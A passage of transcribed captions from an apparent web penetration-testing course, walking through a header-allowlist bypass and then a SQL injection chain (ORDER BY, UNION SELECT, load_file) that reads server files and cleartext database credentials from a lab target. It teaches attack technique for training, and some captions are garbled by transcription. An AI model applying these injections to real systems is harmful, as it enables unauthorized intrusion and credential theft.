Wherever you put these keywords, it will replace them with the values of the specified payload.

385
00:27:30,420 --> 00:27:31,730
So we're putting these keywords here.

386
00:27:32,700 --> 00:27:39,240
So the first word list goes in its place and the second word list for IP will go in this place.

387
00:27:39,430 --> 00:27:39,750
Right.

388
00:27:40,350 --> 00:27:40,910
Makes sense.

389
00:27:41,760 --> 00:27:42,250
The presenter.

390
00:27:43,520 --> 00:27:49,670
And that looks a lot better, but it's still a lot of data, so we probably want to filter out anything

391
00:27:49,670 --> 00:27:50,810
that's 89 characters.

392
00:27:51,800 --> 00:27:54,040
Let's go up let's look down here to see how to do that.

393
00:27:54,950 --> 00:28:00,560
And it looks like if we do --hh and then a number for the number of characters,

394
00:28:01,220 --> 00:28:02,780
it will filter those out.

395
00:28:04,250 --> 00:28:08,780
OK, let's go back here and we do --hh 89.

396
00:28:12,080 --> 00:28:17,450
That looks a lot better now we see there's one particular header and IP combination that gets us a different

397
00:28:17,450 --> 00:28:18,110
response.

398
00:28:19,610 --> 00:28:20,510
Still 200 code.

399
00:28:20,990 --> 00:28:25,280
We're getting 466 words back or almost 8000 characters back.

400
00:28:25,910 --> 00:28:29,990
Let's copy this and let's put this in Burp and see if we can figure out what is going on.

401
00:28:32,580 --> 00:28:39,390
Let's close that out, let's close this out, and let's make sure we are putting the traffic through

402
00:28:39,390 --> 00:28:43,950
Burp, and let's see, let's go to Burp.

403
00:28:45,810 --> 00:28:49,900
Proxy, intercept is on, let's go to admin.

404
00:28:50,880 --> 00:28:53,220
We grabbed it and let's go and put this new field in here.

405
00:28:56,030 --> 00:29:00,090
You'll notice this header is way out here, so I'm going to drag it back in.

406
00:29:02,060 --> 00:29:08,780
And I'm going to change this single dash to a colon, and then I'm going to hit this little newline button

407
00:29:08,900 --> 00:29:13,520
so that we can see that each header has appropriate ending at the end.

408
00:29:14,270 --> 00:29:18,290
Again, that's the newline character for Windows, which is what we want.

409
00:29:20,010 --> 00:29:21,720
All right, so that looks good.

410
00:29:21,750 --> 00:29:23,100
Let's go ahead and forward it.

411
00:29:24,160 --> 00:29:27,900
We've got a response back and so far it looks good.

412
00:29:27,930 --> 00:29:31,050
Let's go ahead and turn intercept off and see if it forwards us through.

413
00:29:31,470 --> 00:29:32,070
Yes.

414
00:29:32,070 --> 00:29:32,780
To the back end.

415
00:29:33,480 --> 00:29:34,200
And this is really cool.

416
00:29:34,590 --> 00:29:35,220
You see products.

417
00:29:35,220 --> 00:29:36,740
We see a way to create products.

418
00:29:36,750 --> 00:29:39,570
We see categories, you know, again, we can control.

419
00:29:39,570 --> 00:29:47,490
You look at the source code here, look at any anything that looks interesting to us, any comments,

420
00:29:48,810 --> 00:29:51,930
you know, any scripts and some hidden fields here.

421
00:29:52,410 --> 00:29:52,770
Right.

422
00:29:52,990 --> 00:29:55,260
Sometimes you can find credentials and things like that in hidden fields.

423
00:29:56,410 --> 00:30:01,860
But we're going to notice, if we try to do anything like, for example, test for a SQL injection

424
00:30:02,160 --> 00:30:02,910
with a single tick.

425
00:30:04,340 --> 00:30:05,340
It's going to say the header is missing.

426
00:30:05,900 --> 00:30:06,920
How do you think we can fix this?

427
00:30:08,460 --> 00:30:09,330
Think about it for a moment.

428
00:30:10,320 --> 00:30:12,510
What we want to do, all the traffic is going through Burp.

429
00:30:13,290 --> 00:30:18,060
So, you know, if we can rewrite each request to include that header, we might be able to get around

430
00:30:18,060 --> 00:30:18,200
it.

431
00:30:19,110 --> 00:30:19,950
So we've got two options.

432
00:30:20,880 --> 00:30:24,030
Go down to match, replace.

433
00:30:25,260 --> 00:30:31,050
And we're going to go to Add, and this is what it says: type, request header; match, regex condition

434
00:30:31,050 --> 00:30:32,280
to match, leave blank to add.

435
00:30:32,280 --> 00:30:35,550
And leave it blank, because what we want to do is we want to add a new header.

436
00:30:35,560 --> 00:30:40,190
So we will leave this field blank, and the literal string to replace with, leave blank to remove a matched header.

437
00:30:40,380 --> 00:30:40,640
Nope.

438
00:30:40,650 --> 00:30:43,110
We want a real string to add.

439
00:30:44,360 --> 00:30:46,130
So we're going to just copy and paste it in.

440
00:30:46,570 --> 00:30:47,560
I'm going to clean this up.

441
00:30:52,310 --> 00:30:56,480
And then I'm going to say, for the comment, copy that to the clipboard in case I need it later, I'm going to

442
00:30:56,480 --> 00:31:04,250
say, and then, "Control bypass: the custom HTTP header."

443
00:31:05,450 --> 00:31:08,840
OK, let's click OK here and make sure it's enabled.

444
00:31:10,260 --> 00:31:15,750
All right, so now the requests are being rewritten, and if we go back to the Web page, we should

445
00:31:15,750 --> 00:31:16,110
see.

446
00:31:18,010 --> 00:31:19,150
The page loads just fine.

447
00:31:21,200 --> 00:31:22,730
Let's see back.

448
00:31:29,260 --> 00:31:35,110
Yep, so everything's working right, and we also see a SQL injection, this is error-based SQL injection.

449
00:31:35,110 --> 00:31:38,680
Clearly it's saying you have an error in your SQL syntax.

450
00:31:38,680 --> 00:31:39,370
So let's play with this.

451
00:31:39,370 --> 00:31:42,040
We're going to do some manual SQL injection, and I'm going to show you something really, really

452
00:31:42,040 --> 00:31:42,580
cool here.

453
00:31:43,210 --> 00:31:44,470
You're finally going to understand this.

454
00:31:44,470 --> 00:31:47,440
If you've always wondered how a SQL injection works, now you'll know.

455
00:31:48,620 --> 00:31:51,940
Let's go back to Burp and let's look at our history.

456
00:31:52,330 --> 00:31:53,320
Let's go down to the bottom.

457
00:31:55,050 --> 00:31:56,630
Let's see, do we have this request?

458
00:32:01,990 --> 00:32:08,920
As we do. So, Ctrl+R, Ctrl+Shift+R, send it to Repeater, and then Ctrl+Space

459
00:32:09,250 --> 00:32:10,330
to send it through.

460
00:32:12,140 --> 00:32:15,920
What I'm going to do is, I'm first going to look at the error message, it's saying that the header is missing.

461
00:32:17,280 --> 00:32:21,270
So for some reason, it didn't actually add the header to the request here, so let's go and add

462
00:32:21,270 --> 00:32:23,840
that and try to send it again.

463
00:32:25,430 --> 00:32:33,200
Ctrl+Space again, and now it went through, and we should see this error, right? To make it automatically

464
00:32:33,210 --> 00:32:38,120
scroll to that part of the response, type "error" in the search box.

465
00:32:38,360 --> 00:32:42,510
And if I go to settings, I can actually say auto-scroll to match when text changes.

466
00:32:42,940 --> 00:32:43,230
Right.

467
00:32:44,170 --> 00:32:48,590
So now I can change this to a single tick, which is %27.

468
00:32:50,270 --> 00:32:51,530
And you see that, right?

469
00:32:51,770 --> 00:32:55,820
If I change it to a P, which is a valid product name, you don't get an error message.

470
00:32:57,170 --> 00:32:57,730
Sweet, sweet.

471
00:32:57,740 --> 00:33:00,790
And how did I know to use P.

472
00:33:00,910 --> 00:33:03,170
Well if we go back here, let's go back.

473
00:33:05,030 --> 00:33:11,130
See, P is a product name. We could have used any of these products, but I use P because it's the easiest

474
00:33:11,130 --> 00:33:11,420
to type.

475
00:33:13,560 --> 00:33:14,280
So let's experiment.

476
00:33:14,310 --> 00:33:17,210
We've got SQL injection here, how can we how can we really test this?

477
00:33:17,220 --> 00:33:17,970
What can we do with this?

478
00:33:18,000 --> 00:33:22,650
Well, the first thing I'd like to do whenever I have SQL injection is, I need to determine

479
00:33:22,650 --> 00:33:24,450
how many columns we have in the database.

480
00:33:25,560 --> 00:33:25,910
Right.

481
00:33:26,280 --> 00:33:28,860
That's really important for a lot of attacks that we're going to do.

482
00:33:30,030 --> 00:33:31,860
So let's go ahead and start by ordering.

483
00:33:31,860 --> 00:33:37,380
Now, actually, what I'm going to do first is go to W3Schools and show you how this works.

484
00:33:42,530 --> 00:33:43,590
So forget the injection.

485
00:33:43,610 --> 00:33:45,200
This is just regular SQL, right?

486
00:33:46,040 --> 00:33:48,080
So it sorts a result set in ascending or descending order.

487
00:33:49,100 --> 00:33:54,770
So we have a database, a customers table, and we do an ORDER BY this.

488
00:33:55,040 --> 00:33:55,670
Look what happens.

489
00:33:55,880 --> 00:33:56,510
Try it yourself.

490
00:33:56,510 --> 00:33:56,750
Right.

491
00:33:57,080 --> 00:33:57,920
Click Run SQL.

492
00:34:01,010 --> 00:34:07,310
You can see it's ordering by the country right here, and if we look, these are different

493
00:34:07,310 --> 00:34:07,840
columns, right?

494
00:34:07,850 --> 00:34:12,610
One, two, three, four, five, six, seven.

495
00:34:12,620 --> 00:34:18,770
So one way to identify column is through its index, which is the number of the column.

496
00:34:18,800 --> 00:34:21,970
So if I say ORDER BY 7, I should get the same result.

497
00:34:24,600 --> 00:34:26,750
Same thing if we ORDER BY 6.

498
00:34:28,380 --> 00:34:29,610
It should order by the postal code.

499
00:34:32,990 --> 00:34:38,060
It does. Right, now if I say ORDER BY 10, I should get an error message, because I don't have 10 columns.

500
00:34:38,930 --> 00:34:40,640
So do you see how this works?

501
00:34:41,210 --> 00:34:44,270
This is actually a pretty good way to identify how many columns you have in the database.

502
00:34:44,870 --> 00:34:52,340
So let's go back to Burp, see if we can do that ORDER BY. You might say, oh, let's just do this.

503
00:34:52,340 --> 00:34:52,610
Right.

504
00:34:53,420 --> 00:34:57,650
It's not gonna quite work because our syntax is not correct.

505
00:34:59,180 --> 00:35:02,530
What we need to do is, we are injecting into a string somewhere.

506
00:35:02,540 --> 00:35:07,450
So we're injecting right here into some query that we don't yet have access to.

507
00:35:08,510 --> 00:35:10,400
And there's probably some stuff that comes after this.

508
00:35:11,650 --> 00:35:17,410
Somewhere, so we need to comment that out, and the way to do that in MySQL is using

509
00:35:17,410 --> 00:35:20,050
dash, dash, space.

510
00:35:20,320 --> 00:35:20,630
Right.

511
00:35:20,830 --> 00:35:23,020
That's how you can actually comment stuff out.

512
00:35:24,610 --> 00:35:30,180
And here you see it actually completed now, because now it's saying unknown column '10',

513
00:35:31,120 --> 00:35:32,440
but what if I changed it to five?

514
00:35:34,890 --> 00:35:38,820
Ctrl+Space, and it automatically zooms down.

515
00:35:42,430 --> 00:35:44,770
Let's see here what we don't get the error message, so that's good.

516
00:35:44,800 --> 00:35:47,720
So that means there's probably definitely five columns listed.

517
00:35:47,740 --> 00:35:48,160
Six.

518
00:35:49,120 --> 00:35:49,390
Control.

519
00:35:49,980 --> 00:35:51,430
Control space.

520
00:35:54,650 --> 00:36:00,780
Not seeing that either. Six? Seven? Ctrl+Space: error message, unknown column 7.

521
00:36:00,800 --> 00:36:01,820
So we know there's six columns.

522
00:36:02,210 --> 00:36:07,790
Now that we know the six columns, we can use a union injection to append one query into the next.

523
00:36:07,890 --> 00:36:08,140
So.

524
00:36:08,400 --> 00:36:10,900
So UNION, let's look at this.

525
00:36:11,240 --> 00:36:11,810
W3Schools.

526
00:36:12,840 --> 00:36:13,490
Let's look at UNION.

527
00:36:14,660 --> 00:36:17,090
If I go to SQL UNION.

528
00:36:17,090 --> 00:36:18,170
UNION, UNION.

529
00:36:18,350 --> 00:36:18,880
Here we go.

530
00:36:20,390 --> 00:36:25,400
You can actually join two result sets into one result set.

531
00:36:26,420 --> 00:36:26,770
Right.

532
00:36:27,380 --> 00:36:28,130
So let's see here.

533
00:36:32,640 --> 00:36:38,730
So we've got this customers table and we've got the suppliers table, and if we do a UNION, it'll join them.

534
00:36:39,120 --> 00:36:40,740
Let me show you, try it yourself.

535
00:36:41,600 --> 00:36:44,310
So first, let's just take this out so you can see what it looks like.

536
00:36:46,990 --> 00:36:51,820
Without any fancy SQL going on, that just selects all the cities from customers, right?

537
00:36:52,860 --> 00:36:53,290
See?

538
00:36:55,530 --> 00:36:59,520
And if we change this to suppliers, let's take this out.

539
00:37:01,370 --> 00:37:03,790
Run it. Suppliers.

540
00:37:05,720 --> 00:37:11,040
The city from the suppliers is the column we're selecting, so do Ctrl+Z, Ctrl+Z.

541
00:37:12,290 --> 00:37:16,190
Now, if we do both and attach it with a UNION,

542
00:37:18,600 --> 00:37:21,570
we will actually get both results returned in a single result set,

543
00:37:24,790 --> 00:37:29,530
which is what we're seeing here. In order for this to work, the number of columns has to match between

544
00:37:29,530 --> 00:37:35,440
both SELECT statements on both sides of the UNION, and the data type has to match

545
00:37:35,440 --> 00:37:35,830
as well.

546
00:37:36,430 --> 00:37:41,410
Another good explanation for this is PortSwigger's website, PortSwigger SQL UNION.

547
00:37:45,270 --> 00:37:48,960
This used to really confuse me, but this stuff really makes a lot of sense, if you think about it.

548
00:37:51,080 --> 00:37:56,660
To determine the number of columns, see, first we're ordering by the index of the column, we keep incrementing

549
00:37:56,660 --> 00:37:59,840
until we get an error message and we're just commenting out everything that follows it.

550
00:38:02,200 --> 00:38:03,400
There's another way to do it this way.

551
00:38:03,610 --> 00:38:09,250
I use the ORDER BY because it's less likely to be caught by detection tools like web application firewalls

552
00:38:10,810 --> 00:38:11,590
and things like that.

553
00:38:14,780 --> 00:38:19,290
And then once you find out how many columns you are you have, you want to see what the data is.

554
00:38:19,700 --> 00:38:24,230
So here we're just searching through each column type until we find what we're trying to see,

555
00:38:24,230 --> 00:38:26,090
if we can insert a string

556
00:38:27,620 --> 00:38:32,360
in each of these columns, because that's how we're going to use the injection point. Go back here.

557
00:38:33,910 --> 00:38:43,270
Let's just do this, right: UNION SELECT 1,2,3,4,5,6, Ctrl+Space, we

558
00:38:43,270 --> 00:38:45,540
shouldn't get an error message or anything, right?

559
00:38:45,550 --> 00:38:46,480
So far, everything's good.

560
00:38:47,650 --> 00:38:49,510
So let's go ahead and put in this first field.

561
00:38:50,590 --> 00:38:54,490
Let's just put the user() function and see what happens.

562
00:38:56,720 --> 00:39:01,220
We got a user, so let's scroll down to this. Every time, what I'm going to do is I'm going to search

563
00:39:01,730 --> 00:39:02,930
for <td>2.

564
00:39:06,410 --> 00:39:11,720
<td>2</td>. What I'm doing is, in HTML, I'm telling it to match on this particular string.

565
00:39:11,960 --> 00:39:17,090
So every time, as we're building our SQL injection query, we can immediately see the results

566
00:39:17,090 --> 00:39:18,600
without having to scroll down the response.

567
00:39:19,380 --> 00:39:19,700
All right.

568
00:39:19,710 --> 00:39:20,510
So that's user().

569
00:39:20,540 --> 00:39:25,970
We see that this database is running as manager@localhost. We can probably look at the database

570
00:39:25,970 --> 00:39:26,330
too.

571
00:39:31,480 --> 00:39:36,550
Yeah, we're in the warehouse database. Let's see what else we can do, we can probably look at the version.

572
00:39:39,540 --> 00:39:40,710
Yep, indeed.

573
00:39:41,640 --> 00:39:48,420
Now, the next thing I want to do is pull some files, right, because we have this injection point.

574
00:39:50,200 --> 00:39:58,420
And, you know, we can use this to see what files we can grab so we know this is a Windows server and

575
00:39:59,110 --> 00:40:01,390
let's see if we can pull something out of here.

576
00:40:02,670 --> 00:40:04,870
Let's do a load_file.

577
00:40:07,480 --> 00:40:08,020
Tick, tick.

578
00:40:08,320 --> 00:40:12,040
And this is a Windows box, so it's probably going to be in the C drive.

579
00:40:12,090 --> 00:40:14,230
I'm just I'm just guessing where it's going to be.

580
00:40:15,350 --> 00:40:18,890
Let's see, inetpub, maybe wwwroot.

581
00:40:19,450 --> 00:40:25,840
Let's just try index.php. Right now we have 2,255 bytes. Ctrl+Space.

582
00:40:26,050 --> 00:40:27,070
That number changed.

583
00:40:28,930 --> 00:40:32,500
So it's possible that the behavior of this page changed in some way.

584
00:40:33,480 --> 00:40:35,400
But I don't see a file, right?

585
00:40:35,430 --> 00:40:37,070
I don't see anything output.

586
00:40:38,540 --> 00:40:40,500
We could try converting this to base64.

587
00:40:42,500 --> 00:40:44,690
to_base64.

588
00:40:50,200 --> 00:40:58,180
Ctrl+Space, and we're now getting an error message, and it says function warehouse.tobase64 does not

589
00:40:58,180 --> 00:40:59,570
exist, so this function doesn't exist.

590
00:41:00,430 --> 00:41:01,890
Maybe I did this wrong.

591
00:41:01,900 --> 00:41:05,980
Maybe it's to_base64. Ctrl+Space.

592
00:41:06,220 --> 00:41:06,730
Yes.

593
00:41:08,570 --> 00:41:10,790
Now we've got this value that we can decode.

594
00:41:12,740 --> 00:41:16,430
I understand what happened here, so I'm going to go and copy this.

595
00:41:18,020 --> 00:41:21,150
We are loading this file from the local file system of the victim machine.

596
00:41:21,740 --> 00:41:27,710
This happens to be the default webroot for IIS, and then we're passing it to base64 so that we can export

597
00:41:27,710 --> 00:41:28,130
the data.

598
00:41:28,730 --> 00:41:35,780
We can then go to Decoder, Ctrl+V to paste, and then we can say decode as base64.

599
00:41:36,500 --> 00:41:38,740
And now we've got this file.

600
00:41:39,080 --> 00:41:41,690
There is another way to do this, and to redo this.

601
00:41:41,690 --> 00:41:43,940
It's just to put it in.

602
00:41:44,450 --> 00:41:50,480
So let's go here, sudo vim, let's do index.php.b64.

603
00:41:53,640 --> 00:42:02,760
i, Ctrl+V, escape, :wq, cat, it's there, so that we can do base64 -d

604
00:42:04,510 --> 00:42:05,290
index.php.b64.

605
00:42:07,910 --> 00:42:08,630
See what we got here?

606
00:42:12,470 --> 00:42:13,400
Anything interesting?

607
00:42:15,890 --> 00:42:17,630
Well, this is the source code that we saw, right?

608
00:42:19,750 --> 00:42:25,600
So nothing really different than what we've already seen, but remember, there was an admin.php, right?

609
00:42:28,130 --> 00:42:29,070
Let's try to grab that file.

610
00:42:30,620 --> 00:42:31,580
Let's go back to our Repeater.

611
00:42:33,180 --> 00:42:34,140
Change this to.

612
00:42:37,600 --> 00:42:39,360
Ctrl+Space, yeah.

613
00:42:39,490 --> 00:42:40,570
Now we're cooking with gas.

614
00:42:41,290 --> 00:42:42,130
Let's grab this.

615
00:42:46,510 --> 00:42:53,410
Right-click, copy. Tab, sudo vim admin.php.b64.

616
00:42:56,590 --> 00:43:04,540
And let's see, i, Ctrl+V, escape, :wq, base64 -d

617
00:43:05,670 --> 00:43:09,240
Let's do admin.php.b64.

618
00:43:11,080 --> 00:43:12,250
All right, let's actually look at that.

619
00:43:14,580 --> 00:43:15,240
We can't.

620
00:43:16,810 --> 00:43:22,720
Let's see, hold on, because I want to look at it in vim, because it has syntax highlighting

621
00:43:23,080 --> 00:43:24,010
and things like that.

622
00:43:24,880 --> 00:43:28,150
So let's see here, first of all.

623
00:43:29,420 --> 00:43:32,360
My OCD is getting mad because these formats don't follow.

624
00:43:33,530 --> 00:43:40,130
So let me go and change that, sudo mv, admin.php.b64.

625
00:43:41,130 --> 00:43:45,030
OK, and then what we can do is sudo base64

626
00:43:48,360 --> 00:43:55,400
-d, and then we will output that to admin.php.

627
00:43:56,210 --> 00:43:57,780
OK, so permission denied.

628
00:43:57,810 --> 00:43:58,980
Let's do this as root.

629
00:44:00,600 --> 00:44:03,160
sudo -i, cd.

630
00:44:06,630 --> 00:44:08,860
cd /home/pentester.

631
00:44:10,470 --> 00:44:18,000
Ctrl+V, and then we can do base64 -d and now output that to admin.php.

632
00:44:21,290 --> 00:44:29,180
Now it's there, and if we exit that and go back to the pentester account, we should now be able to look

633
00:44:29,180 --> 00:44:31,200
at this in vim.

634
00:44:32,000 --> 00:44:34,670
So let's go up here, exit.

635
00:44:36,390 --> 00:44:38,130
And let's take a look at what's going on here.

636
00:44:39,600 --> 00:44:39,950
Oops.

637
00:44:41,250 --> 00:44:41,830
Here we go.

638
00:44:42,390 --> 00:44:43,080
Let's go to the top.

639
00:44:45,400 --> 00:44:49,570
Something that right here looks like a clipped off the top of this, and so let's try it again.

640
00:44:50,740 --> 00:44:52,510
Shift-colon, q, vim.

641
00:44:54,700 --> 00:44:55,240
Here we go.

642
00:44:55,990 --> 00:45:03,910
All right, so it's saying this IP, 192.168.4.28.

643
00:45:04,480 --> 00:45:05,470
Is it an array?

644
00:45:05,740 --> 00:45:07,430
It's a single value of this array.

645
00:45:07,430 --> 00:45:09,670
And we're storing it in the variable named allowed.

646
00:45:10,480 --> 00:45:18,310
And then it's saying if the X-Forwarded-For header is not set, then take the remote address, the network

647
00:45:18,310 --> 00:45:23,260
address that's connecting to the server, and store it in this $_SERVER

648
00:45:24,230 --> 00:45:25,820
array as HTTP_X_FORWARDED_FOR.

649
00:45:27,490 --> 00:45:31,520
So that's just some housekeeping there, but this is the real bread and butter, this part right here

650
00:45:31,520 --> 00:45:34,210
is saying if allowed,

651
00:45:36,000 --> 00:45:47,040
is in this array, so if the IP we are connecting from is in this X-Forwarded-For header that's being

652
00:45:47,040 --> 00:45:48,960
sent in, then.

653
00:45:49,880 --> 00:45:56,480
If this condition is true, you notice there's nothing here, so we should just skip over the else

654
00:45:56,480 --> 00:45:58,260
and go directly to loading the admin page.

655
00:45:59,060 --> 00:46:01,250
Otherwise, the header isn't there.

656
00:46:02,210 --> 00:46:04,130
And so we get the same message which we've seen already.

657
00:46:04,130 --> 00:46:04,370
Right.

658
00:46:06,070 --> 00:46:06,890
You've already seen this.

659
00:46:08,600 --> 00:46:11,780
So let's go ahead and scroll down this page and see if there's anything else that's interesting here.

660
00:46:13,480 --> 00:46:18,460
This is the actual SQL injection point, so you can see it's a SELECT * FROM products, ORDER

661
00:46:18,460 --> 00:46:21,280
BY name ASC LIMIT 5.

662
00:46:21,940 --> 00:46:24,070
So we are injecting in this name parameter right here.

663
00:46:26,630 --> 00:46:29,360
And when we put that single tick.

664
00:46:30,500 --> 00:46:33,200
That single tick is closing out this single tick.

665
00:46:36,140 --> 00:46:46,910
And then we put the P and Tic-Tac that attack, that part comments out this entire section right here.

666
00:46:48,240 --> 00:46:50,490
It's hard for me to highlight this, but.

667
00:46:51,680 --> 00:46:56,990
If I can go back to Burp, let's see, yeah, so this PAETEC, that PAETEC there.

668
00:46:58,780 --> 00:47:02,230
Is here in the tech, they're closes up this here.

669
00:47:04,080 --> 00:47:06,840
And then going back to this injection point.

670
00:47:09,060 --> 00:47:17,180
This dash dash space dash comments out everything else out here, ASC space LIMIT space five, right?

671
00:47:19,660 --> 00:47:22,760
And then we're just putting all this data in in its place.

672
00:47:22,780 --> 00:47:23,620
This is all going.

673
00:47:24,780 --> 00:47:31,770
In this name field, so there's no parameterization, there's no sanitization, it's literally just passing this

674
00:47:31,770 --> 00:47:36,660
raw name, which is unsanitized, it's very unsafe.

675
00:47:36,890 --> 00:47:38,700
It's being passed into this product array.

676
00:47:40,500 --> 00:47:47,820
And that is essentially printing out the raw values of this array into the source code

677
00:47:47,820 --> 00:47:48,640
of the Web application.

678
00:47:49,320 --> 00:47:50,970
So this is why the SQL injection works.

679
00:47:51,330 --> 00:47:52,590
Later, we're actually going to look at the logs.

680
00:47:52,600 --> 00:47:53,670
I'm going to show you what it looks like.

681
00:47:54,750 --> 00:47:56,410
You're going to be surprised because you're not going to see it.

682
00:47:57,300 --> 00:47:58,260
I'll tell you what I mean in a moment.

683
00:47:58,270 --> 00:48:00,690
So that's interesting.

684
00:48:01,020 --> 00:48:04,460
But we also noticed there's a database that file here.

685
00:48:05,340 --> 00:48:08,460
So we should try to get that because database files usually have credentials.

686
00:48:09,130 --> 00:48:12,600
So let's go ahead and exit this.

687
00:48:15,510 --> 00:48:19,160
So let's update this to database, control space.

688
00:48:19,350 --> 00:48:24,470
We've got some more goodness. Got that on the clipboard, and let's take a look at it.

689
00:48:38,840 --> 00:48:43,010
Escape, shift V, and then we'll do the base64

690
00:48:46,930 --> 00:48:47,590
Decode.

691
00:48:49,190 --> 00:48:51,710
It was a load_file of database.php.

692
00:49:00,980 --> 00:49:02,210
Colon, set nu.

693
00:49:02,540 --> 00:49:08,060
I just like having the numbers there. So there's the database name, we've got the username and we've got clear

694
00:49:08,060 --> 00:49:10,250
text creds, very, very nice.

695
00:49:11,660 --> 00:49:13,070
So we should add this to our list.

696
00:49:13,340 --> 00:49:18,220
So control a shift percent of them.

697
00:49:18,530 --> 00:49:20,050
Let's call it creds.txt.

698
00:49:21,180 --> 00:49:23,490
I was put in this manager.

699
00:49:24,880 --> 00:49:26,080
And we see the password here.

700
00:49:27,350 --> 00:49:27,750
See?

701
00:49:29,430 --> 00:49:35,670
Having some problems like this, if I press, why, why control a great escape?

702
00:49:36,770 --> 00:49:43,610
Capital P didn't do what I wanted, u to undo, I had to type it in.

703
00:49:47,440 --> 00:49:53,440
yy is supposed to copy it to the clipboard and then capital P is supposed to paste it, and then I

704
00:49:53,440 --> 00:49:55,870
like to put where we found it, so.

705
00:49:56,840 --> 00:49:57,500
Discovered.

706
00:50:00,970 --> 00:50:02,250
Let's put it above it.

707
00:50:04,920 --> 00:50:12,750
Discovered the SQL injection, data exfiltration, SQL injection.

708
00:50:15,840 --> 00:50:19,020
Chained to local file include.

709
00:50:21,220 --> 00:50:26,860
Data, leading to data exfil, to data exfiltration.

710
00:50:31,900 --> 00:50:33,850
Cat creds, nice.

711
00:50:34,840 --> 00:50:41,200
All right, so that's it, you've got some creds, cooking with gas.

712
00:50:43,060 --> 00:50:45,060
So let's see what else we can do here.

713
00:50:47,010 --> 00:50:59,100
Let's take a look at the MySQL schemata; w w o, Google MySQL information schema.

714
00:51:04,610 --> 00:51:05,100
Sweet.

715
00:51:05,150 --> 00:51:06,410
So there should be a schemata.

716
00:51:12,630 --> 00:51:13,390
Let's getting out of table.

717
00:51:13,480 --> 00:51:19,710
Yes, this is our table: provides information about databases, name of the schema.

718
00:51:21,930 --> 00:51:23,160
See, what do we want to get out of here?

719
00:51:24,090 --> 00:51:25,890
You probably want the name of the schema, right?

720
00:51:26,160 --> 00:51:29,710
So we can say select, let's first redo this query.

721
00:51:29,710 --> 00:51:31,590
It was changed up, actually, what we can do.

722
00:51:33,140 --> 00:51:42,620
Let's rename this, double click in here, we'll call this SQLi to LFI, let's rebuild this query,

723
00:51:43,070 --> 00:51:47,240
take out load_file and then I'll take out to_base64.

724
00:51:48,790 --> 00:51:49,570
Let's go back here.

725
00:51:51,010 --> 00:51:52,810
information_schema.schemata.

726
00:51:54,470 --> 00:51:55,100
Select.

727
00:51:56,870 --> 00:51:58,480
What are we selecting? schema_name.

728
00:51:59,270 --> 00:52:02,720
So this is the column: select schema_name.

729
00:52:04,520 --> 00:52:15,530
schema_name from information_schema.schemata, control space, let's see, I think that works.

730
00:52:20,320 --> 00:52:26,590
Let's see if we've got some kind of syntax error here, schema_name from information_schema.

731
00:52:26,590 --> 00:52:28,030
Let's just copy and paste.

732
00:52:29,340 --> 00:52:30,630
I find that sometimes works better.

733
00:52:33,800 --> 00:52:34,360
Joseph.

734
00:52:35,760 --> 00:52:36,120
V..

735
00:52:40,150 --> 00:52:41,020
As part of this.

736
00:52:46,090 --> 00:52:47,050
Joe, the.

737
00:52:48,800 --> 00:52:50,120
And we'll just put a dot.

738
00:52:59,010 --> 00:53:01,410
And we're still seeing an error in SQL syntax.

739
00:53:06,080 --> 00:53:10,520
Let's see, I could try putting this like this.

740
00:53:14,130 --> 00:53:15,660
Nope, that just makes it a literal string.

741
00:53:17,960 --> 00:53:21,020
So bring these in parentheses, control space.

742
00:53:28,610 --> 00:53:29,840
Let's try another select.

743
00:53:34,690 --> 00:53:35,170
Here we go.

744
00:53:36,250 --> 00:53:41,260
So you notice I had to put this; this one used to be this, right?

745
00:53:43,210 --> 00:53:44,350
And if I press control Z.

746
00:53:50,470 --> 00:53:53,230
Press control Z, you'll see what I did is I put the whole thing in parentheses.

747
00:53:54,810 --> 00:53:59,790
And then I just ran a sub select statement inside of the parentheses.

748
00:54:00,790 --> 00:54:01,660
When I did that.

749
00:54:03,100 --> 00:54:07,500
I get an error message about cardinality. Now, before we go deeper,

750
00:54:07,860 --> 00:54:12,000
I just realized I forgot to do something, and we'll address this error in a second.

751
00:54:12,900 --> 00:54:14,550
What I want to do is I want to copy this.

752
00:54:16,410 --> 00:54:17,640
Control C, copy.

753
00:54:19,090 --> 00:54:24,910
And when I go all the way back to FDR, did it feel like this is a control space?

754
00:54:26,090 --> 00:54:27,290
Then I want to go to number two.

755
00:54:28,760 --> 00:54:30,980
Control the control space.

756
00:54:33,390 --> 00:54:38,010
Schemata, so now we have these different tabs for each different thing, right, SQLi to LFI

757
00:54:38,310 --> 00:54:39,840
and then schemata right there.

758
00:54:41,470 --> 00:54:47,140
It just makes it a lot easier to stay organized when you have these tabs specified by purpose in Repeater.

759
00:54:48,820 --> 00:54:51,340
And then let's put this error back in.

760
00:54:52,620 --> 00:54:54,720
And make sure it's still set to Orosco to match.

761
00:54:56,130 --> 00:55:02,080
All right, so it's cardinality, but what this basically is saying is that we were returning more than one

762
00:55:02,080 --> 00:55:02,520
row.

763
00:55:02,790 --> 00:55:06,480
So we need to concatenate the results into one row if we go here.

764
00:55:07,940 --> 00:55:09,560
It's a group concat.

765
00:55:12,290 --> 00:55:13,670
Aggregate functions.

766
00:55:15,970 --> 00:55:21,790
Group concat, this function returns a string result with the concatenated non-NULL values from a group,

767
00:55:22,780 --> 00:55:23,580
that's what we want to do.

768
00:55:23,590 --> 00:55:24,670
We want to run this.

769
00:55:26,670 --> 00:55:29,550
This group concat on a single column.

770
00:55:32,230 --> 00:55:33,100
So if we go.

771
00:55:34,140 --> 00:55:34,800
Let's see.

772
00:55:36,550 --> 00:55:37,250
Concat.

773
00:55:40,650 --> 00:55:41,130
Space.

774
00:55:45,560 --> 00:55:50,630
Now, we've got everything here, but it's still a little difficult to read because of these commas;

775
00:55:50,630 --> 00:55:53,570
it's all on one line. I would like to separate by a new line.

776
00:55:54,680 --> 00:56:01,760
So we go back here and you can see that there is a separator, which you can add here, right just at

777
00:56:01,760 --> 00:56:03,890
the end of the group_concat, inside the parentheses.

778
00:56:06,170 --> 00:56:08,150
So let's go ahead and do that.

779
00:56:10,290 --> 00:56:12,760
We can say,

780
00:56:13,890 --> 00:56:14,700
Separator.

781
00:56:15,540 --> 00:56:16,530
Let's try a new line.

782
00:56:18,860 --> 00:56:19,340
Joseph.

783
00:56:21,710 --> 00:56:22,370
And that worked.

784
00:56:24,370 --> 00:56:28,710
All right, so now we've got everything on its line and we see there's a MySQL database, so let's try

785
00:56:28,710 --> 00:56:30,480
to connect to that because.

786
00:56:33,200 --> 00:56:37,410
The MySQL database should have a user table.

787
00:56:48,490 --> 00:56:54,950
Yeah, see, there's a user and there's a password column inside of this table so we can use SQL injection.

